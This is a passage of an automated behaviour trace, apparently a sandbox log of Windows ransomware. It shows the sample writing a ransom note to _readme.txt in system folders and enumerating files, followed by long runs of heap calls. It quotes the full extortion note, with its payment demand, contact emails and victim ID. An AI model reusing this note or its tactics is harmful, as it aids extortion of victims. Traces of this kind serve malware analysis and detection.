\"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.790] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.790] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.791] CloseHandle (hObject=0x6f0) returned 1 [0142.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.791] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b4d0f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b4d0f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.791] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b4d0f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b4d0f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.791] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.792] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b4d0f0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b4d0f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b73250, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.792] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b4d0f0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b4d0f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b73250, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.792] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.792] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.798] 